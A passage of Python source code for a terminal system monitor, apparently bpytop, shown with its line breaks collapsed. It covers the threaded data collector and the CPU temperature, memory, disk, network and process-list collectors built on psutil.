- 2) / (proc.num_procs - (cls.select_max - 2))) if scroll_pos < 0 or cls.start == 1: scroll_pos = 0 elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3 out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}' f'{Mv.to(y+1+scroll_pos, x+w-1)}█') elif "scroll_up" in Key.mouse: del Key.mouse["scroll_up"], Key.mouse["scroll_down"] #* Draw current selection and number of processes out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}' f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') #* Clean up dead processes graphs and counters cls.count += 1 if cls.count == 100: cls.count == 0 for p in list(cls.pid_counter): if not psutil.pid_exists(p): del cls.pid_counter[p], Graphs.pid_cpu[p] Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active) cls.redraw = cls.resized = cls.moved = False class Collector: '''Data collector master class * .start(): Starts collector thread * .stop(): Stops collector thread * .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run''' stopping: bool = False started: bool = False draw_now: bool = False redraw: bool = False only_draw: bool = False thread: threading.Thread collect_run = threading.Event() collect_idle = threading.Event() collect_idle.set() collect_done = threading.Event() collect_queue: List = [] collect_interrupt: bool = False proc_interrupt: bool = False use_draw_list: bool = False @classmethod def start(cls): cls.stopping = False cls.thread = threading.Thread(target=cls._runner, args=()) cls.thread.start() cls.started = True @classmethod def stop(cls): if cls.started and cls.thread.is_alive(): cls.stopping = True cls.started = False cls.collect_queue = [] cls.collect_idle.set() cls.collect_done.set() try: cls.thread.join() except: pass @classmethod def _runner(cls): '''This is meant to run in it's own thread, collecting and drawing when collect_run is set''' draw_buffers: List[str] = [] debugged: bool = False try: while not cls.stopping: if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock() cls.collect_run.wait(0.1) if not cls.collect_run.is_set(): continue draw_buffers = [] cls.collect_interrupt = False cls.collect_run.clear() cls.collect_idle.clear() cls.collect_done.clear() if DEBUG and not debugged: TimeIt.start("Collect and draw") while cls.collect_queue: collector = cls.collect_queue.pop() if not cls.only_draw: collector._collect() collector._draw() if cls.use_draw_list: draw_buffers.append(collector.buffer) if cls.collect_interrupt: break if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True if cls.draw_now and not Menu.active and not cls.collect_interrupt: if cls.use_draw_list: Draw.out(*draw_buffers) else: Draw.out() if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock() cls.collect_idle.set() cls.collect_done.set() except Exception as e: errlog.exception(f'Data collection thread failed with exception: {e}') cls.collect_idle.set() cls.collect_done.set() clean_quit(1, thread=True) @classmethod def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False): '''Setup collect queue for _runner''' cls.collect_interrupt = interrupt cls.proc_interrupt = proc_interrupt cls.collect_idle.wait() cls.collect_interrupt = False cls.proc_interrupt = False cls.use_draw_list = False cls.draw_now = draw_now cls.redraw = redraw cls.only_draw = only_draw if collectors: cls.collect_queue = [*collectors] cls.use_draw_list = True else: cls.collect_queue = list(cls.__subclasses__()) cls.collect_run.set() class CpuCollector(Collector): '''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps''' cpu_usage: List[List[int]] = [] cpu_temp: List[List[int]] = [] cpu_temp_high: int = 0 cpu_temp_crit: int = 0 for _ in range(THREADS + 1): cpu_usage.append([]) cpu_temp.append([]) freq_error: bool = False cpu_freq: int = 0 load_avg: List[float] = [] uptime: str = "" buffer: str = CpuBox.buffer sensor_method: str = "" got_sensors: bool = False sensor_swap: bool = False cpu_temp_only: bool = False @classmethod def get_sensors(cls): '''Check if we can get cpu temps and return method of getting temps''' cls.sensor_method = "" if SYSTEM == "MacOS": try: if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit(): cls.sensor_method = "coretemp" elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"): cls.sensor_method = "osx-cpu-temp" except: pass elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors: cls.sensor_method = "psutil" elif hasattr(psutil, "sensors_temperatures"): try: temps = psutil.sensors_temperatures() if temps: for name, entries in temps.items(): if name.lower().startswith("cpu"): cls.sensor_method = "psutil" break for entry in entries: if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")): cls.sensor_method = "psutil" break except: pass if not cls.sensor_method and SYSTEM == "Linux": try: if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"): cls.sensor_method = "vcgencmd" except: pass cls.got_sensors = bool(cls.sensor_method) @classmethod def _collect(cls): cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False))) if len(cls.cpu_usage[0]) > Term.width * 4: del cls.cpu_usage[0][0] for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1): cls.cpu_usage[n].append(round(thread)) if len(cls.cpu_usage[n]) > Term.width * 2: del cls.cpu_usage[n][0] try: if hasattr(psutil.cpu_freq(), "current"): cls.cpu_freq = round(psutil.cpu_freq().current) except Exception as e: if not cls.freq_error: cls.freq_error = True errlog.error("Exception while getting cpu frequency!") errlog.exception(f'{e}') else: pass cls.load_avg = [round(lavg, 2) for lavg in os.getloadavg()] cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3] if CONFIG.check_temp and cls.got_sensors: cls._collect_temps() @classmethod def _collect_temps(cls): temp: int = 1000 cores: List[int] = [] core_dict: Dict[int, int] = {} entry_int: int = 0 cpu_type: str = "" c_max: int = 0 s_name: str = "_-_" s_label: str = "_-_" if cls.sensor_method == "psutil": try: if CONFIG.cpu_sensor != "Auto": s_name, s_label = CONFIG.cpu_sensor.split(":", 1) for name, entries in psutil.sensors_temperatures().items(): for num, entry in enumerate(entries, 1): if name == s_name and (entry.label == s_label or str(num) == s_label) and round(entry.current) > 0: if entry.label.startswith("Package"): cpu_type = "intel" elif entry.label.startswith("Tdie"): cpu_type = "ryzen" else: cpu_type = "other" if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high) else: cls.cpu_temp_high = 80 if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical) else: cls.cpu_temp_crit = 95 temp = round(entry.current) elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current") and round(entry.current) > 0: if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other": cls.sensor_swap = False if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high) else: cls.cpu_temp_high = 80 if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical) else: cls.cpu_temp_crit = 95 cpu_type = "intel" if entry.label.startswith("Package") else "ryzen" temp = round(entry.current) elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0: if entry.label.startswith(("Core", "Tccd")): entry_int = int(entry.label.replace("Core", "").replace("Tccd", "")) if entry_int in core_dict and cpu_type != "ryzen": if c_max == 0: c_max = max(core_dict) + 1 if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict: core_dict[(entry_int + c_max)] = round(entry.current) continue elif entry_int in core_dict: continue core_dict[entry_int] = round(entry.current) continue elif cpu_type in ["intel", "ryzen"]: continue if not cpu_type: cpu_type = "other" if not cls.cpu_temp_high or cls.sensor_swap: cls.sensor_swap = False if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high) else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80 if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical) else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95 temp = round(entry.current) cores.append(round(entry.current)) if core_dict: if not temp or temp == 1000: temp = sum(core_dict.values()) // len(core_dict) if not cls.cpu_temp_high or not cls.cpu_temp_crit: cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95 cls.cpu_temp[0].append(temp) if cpu_type == "ryzen": ccds: int = len(core_dict) cores_per_ccd: int = CORES // ccds z: int = 1 for x in range(THREADS): if x == CORES: z = 1 if CORE_MAP[x] + 1 > cores_per_ccd * z: z += 1 if z in core_dict: cls.cpu_temp[x+1].append(core_dict[z]) else: for x in range(THREADS): if CORE_MAP[x] in core_dict: cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]]) elif len(cores) == THREADS / 2: cls.cpu_temp[0].append(temp) for n, t in enumerate(cores, start=1): try: cls.cpu_temp[n].append(t) cls.cpu_temp[THREADS // 2 + n].append(t) except IndexError: break else: cls.cpu_temp[0].append(temp) if len(cores) > 1: for n, t in enumerate(cores, start=1): try: cls.cpu_temp[n].append(t) except IndexError: break except Exception as e: errlog.exception(f'{e}') cls.got_sensors = False CpuBox._calc_size() else: try: if cls.sensor_method == "coretemp": temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip())) cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()] if len(cores) == THREADS / 2: cls.cpu_temp[0].append(temp) for n, t in enumerate(cores, start=1): try: cls.cpu_temp[n].append(t) cls.cpu_temp[THREADS // 2 + n].append(t) except IndexError: break else: cores.insert(0, temp) for n, t in enumerate(cores): try: cls.cpu_temp[n].append(t) except IndexError: break if not cls.cpu_temp_high: cls.cpu_temp_high = 85 cls.cpu_temp_crit = 100 elif cls.sensor_method == "osx-cpu-temp": temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", universal_newlines=True).strip()[:-2]))) if not cls.cpu_temp_high: cls.cpu_temp_high = 85 cls.cpu_temp_crit = 100 elif cls.sensor_method == "vcgencmd": temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip()[5:-2]))) if not cls.cpu_temp_high: cls.cpu_temp_high = 60 cls.cpu_temp_crit = 80 except Exception as e: errlog.exception(f'{e}') cls.got_sensors = False CpuBox._calc_size() else: if not cores: cls.cpu_temp[0].append(temp) if not core_dict and len(cores) <= 1: cls.cpu_temp_only = True if len(cls.cpu_temp[0]) > 5: for n in range(len(cls.cpu_temp)): if cls.cpu_temp[n]: del cls.cpu_temp[n][0] @classmethod def _draw(cls): CpuBox._draw_fg() class MemCollector(Collector): '''Collects memory and disks information''' values: Dict[str, int] = {} vlist: Dict[str, List[int]] = {} percent: Dict[str, int] = {} string: Dict[str, str] = {} swap_values: Dict[str, int] = {} swap_vlist: Dict[str, List[int]] = {} swap_percent: Dict[str, int] = {} swap_string: Dict[str, str] = {} disks: Dict[str, Dict] disk_hist: Dict[str, Tuple] = {} timestamp: float = time() io_error: bool = False old_disks: List[str] = [] excludes: List[str] = ["squashfs"] if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"] buffer: str = MemBox.buffer @classmethod def _collect(cls): #* Collect memory mem = psutil.virtual_memory() if hasattr(mem, "cached"): cls.values["cached"] = mem.cached else: cls.values["cached"] = mem.active cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available cls.values["used"] = cls.values["total"] - cls.values["available"] for key, value in cls.values.items(): cls.string[key] = floating_humanizer(value) if key == "total": continue cls.percent[key] = round(value * 100 / cls.values["total"]) if CONFIG.mem_graphs: if not key in cls.vlist: cls.vlist[key] = [] cls.vlist[key].append(cls.percent[key]) if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0] #* Collect swap if CONFIG.show_swap or CONFIG.swap_disk: swap = psutil.swap_memory() cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"] if swap.total: if not MemBox.swap_on: MemBox.redraw = True MemBox.swap_on = True for key, value in cls.swap_values.items(): cls.swap_string[key] = floating_humanizer(value) if key == "total": continue cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"]) if CONFIG.mem_graphs: if not key in cls.swap_vlist: cls.swap_vlist[key] = [] cls.swap_vlist[key].append(cls.swap_percent[key]) if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0] else: if MemBox.swap_on: MemBox.redraw = True MemBox.swap_on = False else: if MemBox.swap_on: MemBox.redraw = True MemBox.swap_on = False if not CONFIG.show_disks: return #* Collect disks usage disk_read: int = 0 disk_write: int = 0 dev_name: str disk_name: str filtering: Tuple = () filter_exclude: bool = False io_string: str u_percent: int disk_list: List[str] = [] cls.disks = {} if CONFIG.disks_filter: if CONFIG.disks_filter.startswith("exclude="): filter_exclude = True filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(",")) else: filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(",")) try: io_counters = psutil.disk_io_counters(perdisk=SYSTEM == "Linux", nowrap=True) except ValueError as e: if not cls.io_error: cls.io_error = True errlog.error(f'Non fatal error during disk io collection!') if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7): errlog.error(f'Caused by outdated psutil version.') errlog.exception(f'{e}') io_counters = None for disk in psutil.disk_partitions(): disk_io = None io_string = "" disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root" #while disk_name in disk_list: disk_name += "_" disk_list += [disk_name] if cls.excludes and disk.fstype in cls.excludes: continue if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)): continue #elif filtering and disk_name.endswith(filtering) if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm": continue try: disk_u = psutil.disk_usage(disk.mountpoint) except: pass u_percent = round(disk_u.percent) cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent } for name in ["total", "used", "free"]: cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0)) #* Collect disk io if io_counters: try: if SYSTEM == "Linux": dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1] if dev_name.startswith("md"): try: dev_name = dev_name[:dev_name.index("p")] except: pass disk_io = io_counters[dev_name] elif disk.mountpoint == "/": disk_io = io_counters else: raise Exception disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp)) disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp)) except: disk_read = disk_write = 0 else: disk_read = disk_write = 0 if disk_io: cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes) if MemBox.disks_width > 30: if disk_read > 0: io_string += f'▲{floating_humanizer(disk_read, short=True)} ' if disk_write > 0: io_string += f'▼{floating_humanizer(disk_write, short=True)}' elif disk_read + disk_write > 0: io_string += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}' cls.disks[disk.device]["io"] = io_string if CONFIG.swap_disk and MemBox.swap_on: cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" } for name in ["total", "used", "free"]: cls.disks["__swap"][name] = cls.swap_string[name] if len(cls.disks) > 2: try: new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])} new["__swap"] = cls.disks.pop("__swap") new.update(cls.disks) cls.disks = new except: pass if disk_list != cls.old_disks: MemBox.redraw = True cls.old_disks = disk_list.copy() cls.timestamp = time() @classmethod def _draw(cls): MemBox._draw_fg() class NetCollector(Collector): '''Collects network stats''' buffer: str = NetBox.buffer nics: List[str] = [] nic_i: int = 0 nic: str = "" new_nic: str = "" nic_error: bool = False reset: bool = False graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5} graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5} #min_top: int = 10<<10 #* Stats structure = stats[netword device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool stats: Dict[str, Dict[str, Dict[str, Any]]] = {} #* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str strings: Dict[str, Dict[str, Dict[str, str]]] = {} switched: bool = False timestamp: float = time() net_min: Dict[str, int] = {"download" : -1, "upload" : -1} auto_min: bool = CONFIG.net_auto sync_top: int = 0 sync_string: str = "" @classmethod def _get_nics(cls): '''Get a list of all network devices sorted by highest throughput''' cls.nic_i = 0 cls.nic = "" try: io_all = psutil.net_io_counters(pernic=True) except Exception as e: if not cls.nic_error: cls.nic_error = True errlog.exception(f'{e}') if not io_all: return up_stat = psutil.net_if_stats() for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True): if nic not in up_stat or not up_stat[nic].isup: continue cls.nics.append(nic) if not cls.nics: cls.nics = [""] cls.nic = cls.nics[cls.nic_i] @classmethod def switch(cls, key: str): if len(cls.nics) < 2: return cls.nic_i += +1 if key == "n" else -1 if cls.nic_i >= len(cls.nics): cls.nic_i = 0 elif cls.nic_i < 0: cls.nic_i = len(cls.nics) - 1 cls.new_nic = cls.nics[cls.nic_i] cls.switched = True Collector.collect(NetCollector, redraw=True) @classmethod def _collect(cls): speed: int stat: Dict up_stat = psutil.net_if_stats() if cls.switched: cls.nic = cls.new_nic cls.switched = False if not cls.nic or cls.nic not in up_stat or not up_stat[cls.nic].isup: cls._get_nics() if not cls.nic: return try: io_all = psutil.net_io_counters(pernic=True)[cls.nic] except KeyError: pass return if not cls.nic in cls.stats: cls.stats[cls.nic] = {} cls.strings[cls.nic] = { "download" : {}, "upload" : {}} for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]: cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 } for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]: cls.strings[cls.nic][direction][v] = "" cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent for direction in ["download", "upload"]: stat = cls.stats[cls.nic][direction] strings = cls.strings[cls.nic][direction] #* Calculate current speed stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp))) stat["last"] = stat["total"] speed = stat["speed"][-1] if cls.net_min[direction] == -1: cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction)) stat["graph_top"] = cls.net_min[direction] stat["graph_lower"] = 7 if not cls.auto_min: stat["redraw"] = True strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True) if stat["offset"] and stat["offset"] > stat["total"]: cls.reset = True if cls.reset: if not stat["offset"]: stat["offset"] = stat["total"] else: stat["offset"] = 0 if direction == "upload": cls.reset = False NetBox.redraw = True if len(stat["speed"]) > NetBox.width * 2: del stat["speed"][0] strings["total"] = floating_humanizer(stat["total"] - stat["offset"]) strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True) strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True) if speed > stat["top"] or not stat["top"]: stat["top"] = speed strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True) if cls.auto_min: if speed > stat["graph_top"]: stat["graph_raise"] += 1 if stat["graph_lower"] > 0: stat["graph_lower"] -= 1 elif speed < stat["graph_top"] // 10: stat["graph_lower"] += 1 if stat["graph_raise"] > 0: stat["graph_raise"] -= 1 if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5: if stat["graph_raise"] >= 5: stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8) elif stat["graph_lower"] >= 5: stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3) stat["graph_raise"] = 0 stat["graph_lower"] = 0 stat["redraw"] = True strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True) cls.timestamp = time() if CONFIG.net_sync: c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"]) if c_max != cls.sync_top: cls.sync_top = c_max cls.sync_string = floating_humanizer(cls.sync_top, short=True) NetBox.redraw = True @classmethod def _draw(cls): NetBox._draw_fg() class ProcCollector(Collector): '''Collects process stats''' buffer: str = ProcBox.buffer search_filter: str = "" processes: Dict = {} num_procs: int = 0 det_cpu: float = 0.0 detailed: bool = False detailed_pid: Union[int, None] = None details: Dict[str, Any] = {} details_cpu: List[int] = [] details_mem: List[int] = [] expand: int = 0 collapsed: Dict = {} tree_counter: int = 0 p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"] sort_expr: Dict = {} sort_expr["pid"] = compile("p.info['pid']", "str", "eval") sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval") sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval") sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval") sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval") sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval") sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval") sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval") @classmethod def _collect(cls): '''List all processess with pid, name, arguments, threads, username, memory percent and cpu percent''' if Box.stat_mode: return out: Dict = {} cls.det_cpu = 0.0 sorting: str = CONFIG.proc_sorting reverse: bool = not CONFIG.proc_reversed proc_per_cpu: bool = CONFIG.proc_per_core search: str = cls.search_filter err: float = 0.0 n: int = 0 if CONFIG.proc_tree and sorting == "arguments": sorting = "program" sort_cmd = cls.sort_expr[sorting] if CONFIG.proc_tree: cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search) else: for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse): if cls.collect_interrupt or cls.proc_interrupt: return if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err: continue if p.info["cmdline"] == err: p.info["cmdline"] = "" if p.info["username"] == err: p.info["username"] = "" if p.info["num_threads"] == err: p.info["num_threads"] = 0 if search: if cls.detailed and p.info["pid"] == cls.detailed_pid: cls.det_cpu = p.info["cpu_percent"] for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]: for s in search.split(","): if s.strip() in value: break else: continue break else: continue cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2) mem = p.info["memory_percent"] if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"): mem_b = p.info["memory_info"].rss else: mem_b = 0 cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]" out[p.info["pid"]] = { "name" : p.info["name"], "cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""), "threads" : p.info["num_threads"], "username" : p.info["username"], "mem" : mem, "mem_b" : mem_b, "cpu" : cpu } n += 1 cls.num_procs = n cls.processes = out.copy() if cls.detailed: cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10 if cls.expand > 5: cls.expand = 5 if cls.detailed and not cls.details.get("killed", False): try: c_pid = cls.detailed_pid det = psutil.Process(c_pid) except (psutil.NoSuchProcess, psutil.ZombieProcess): cls.details["killed"] = True cls.details["status"] = psutil.STATUS_DEAD ProcBox.redraw = True else: attrs: List[str] = ["status", "memory_info", "create_time"] if not SYSTEM == "MacOS": attrs.extend(["cpu_num"]) if cls.expand: attrs.extend(["nice", "terminal"]) if not SYSTEM == "MacOS": attrs.extend(["io_counters"]) if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"]) cls.details = det.as_dict(attrs=attrs, ad_value="") if det.parent() != None: cls.details["parent_name"] = det.parent().name() else: cls.details["parent_name"] = "" cls.details["pid"] = c_pid if c_pid in cls.processes: cls.details["name"] = cls.processes[c_pid]["name"] cls.details["cmdline"] = cls.processes[c_pid]["cmd"] cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}' cls.details["username"] = cls.processes[c_pid]["username"] cls.details["memory_percent"] = cls.processes[c_pid]["mem"] cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS)) else: cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]" cls.details["threads"] = f'{cls.details["num_threads"]}' cls.details["cpu_percent"] = round(cls.det_cpu) cls.details["killed"] = False if SYSTEM == "MacOS": cls.details["cpu_num"] = -1 cls.details["io_counters"] = "" if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore else: cls.details["memory_bytes"] = "? Bytes" if isinstance(cls.details["create_time"], float): uptime = timedelta(seconds=round(time()-cls.details["create_time"],0)) if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}' else: cls.details["uptime"] = f'{uptime}' else: cls.details["uptime"] = "??:??:??" if cls.expand: if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}' if SYSTEM == "BSD": if cls.expand > 2: if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}' else: cls.details["io_read"] = "?" if cls.expand > 3: if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}' else: cls.details["io_write"] = "?" else: if cls.expand > 2: if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes) else: cls.details["io_read"] = "?" if cls.expand > 3: if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes) else: cls.details["io_write"] = "?" if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "") cls.details_cpu.append(cls.details["cpu_percent"]) mem = cls.details["memory_percent"] if mem > 80: mem = round(mem) elif mem > 60: mem = round(mem * 1.2) elif mem > 30: mem = round(mem * 1.5) elif mem > 10: mem = round(mem * 2) elif mem > 5: mem = round(mem * 10) else: mem = round(mem * 20) cls.details_mem.append(mem) if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0] if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0] @classmethod def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: str): '''List all processess in a tree view with pid, name, threads, username, memory percent and cpu percent''' out: Dict = {} err: float = 0.0 det_cpu: float = 0.0 infolist: Dict = {} cls.tree_counter += 1 tree = defaultdict(list) n: int = 0 for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse): if cls.collect_interrupt: return try: tree[p.ppid()].append(p.pid) except (psutil.NoSuchProcess, psutil.ZombieProcess): pass else: infolist[p.pid] = p.info n += 1 if 0 in tree and 0 in tree[0]: tree[0].remove(0) def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None): nonlocal infolist, proc_per_cpu, search, out, det_cpu name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False cont: bool = True getinfo: Dict = {} if cls.collect_interrupt: return try: name = psutil.Process(pid).name() if name == "idle": return except psutil.Error: pass cont = False name = "" if pid in infolist: getinfo = infolist[pid] if search and not found: if cls.detailed and pid == cls.detailed_pid: det_cpu = getinfo["cpu_percent"] if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = "" if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = "" for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]: for s in search.split(","): if s.strip() in value: found = True break else: continue break else: cont = False if cont: if getinfo: if getinfo["num_threads"] == err: threads = 0 else: threads = getinfo["num_threads"] if getinfo["username"] == err: username = "" else: username = getinfo["username"] cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2) mem = getinfo["memory_percent"] if getinfo["cmdline"] == err: cmd = "" else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]" if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"): mem_b = getinfo["memory_info"].rss else: mem_b = 0 else: threads = mem_b = 0 username = "" mem = cpu = 0.0 if pid in cls.collapsed: collapse = cls.collapsed[pid] else: collapse = depth > CONFIG.tree_depth cls.collapsed[pid] = collapse if collapse_to and not search: out[collapse_to]["threads"] += threads out[collapse_to]["mem"] += mem out[collapse_to]["mem_b"] += mem_b out[collapse_to]["cpu"] += cpu else: if pid in tree and len(tree[pid]) > 0: sign: str = "+" if collapse else "-" inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─") out[pid] = { "indent" : inindent, "name": name, "cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""), "threads" : threads, "username" : username, "mem" : mem, "mem_b" : mem_b, "cpu" : cpu, "depth" : depth, } 